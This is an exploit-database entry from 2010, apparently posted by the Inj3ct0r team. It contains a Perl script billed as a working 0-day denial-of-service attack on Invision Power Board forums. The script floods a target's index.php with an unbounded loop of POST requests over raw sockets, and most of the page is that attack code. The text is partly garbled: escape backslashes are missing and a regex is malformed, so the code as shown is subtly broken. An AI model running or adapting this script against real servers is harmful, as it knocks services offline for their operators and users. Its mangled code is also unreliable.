[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Invision Power Board 0-day Denial of Service
# Published : 2010-04-25
# Author : SeeMe
# Previous Title : Safari 4.0.5 (531.22.7) Denial of Service
# Next Title : MacOS X 10.6 HFS File System Attack (Denial of Service)


==============================================
Invision power board 0-day denial of service 2 
==============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / __ /'__` 0
0 /_,  ___ /_/_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/__<_ /'___  /    /`'__ 0
0   / /    /   / __/  _  _   / 1
1  _ _ __   ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1  ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm SeeMe member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Invision power board 0-day denial of service 2 100% works..
#
# It works on all versions! can DOS the whole server!
#
# Greetz to Inj3ct0r Crew
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<10; $i--)
{
$user="seeme".$rand.$i;
$data = "adsess=&"
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1rn".
"Accept: * /*rn".
"Accept-Language: en-gbrn".
"Content-Type: application/x-www-form-urlencodedrn".
"Accept-Encoding: gzip, deflatern".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)rn".
"Host: $hostrn".
"Content-Length: $lenrn".
"Connection: Keep-Alivern".
"Cache-Control: no-cachernrn".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0 <host> </dir/>n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 /nn";
exit();
};
################################################## ##############
# Greetz to Inj3ct0r Crew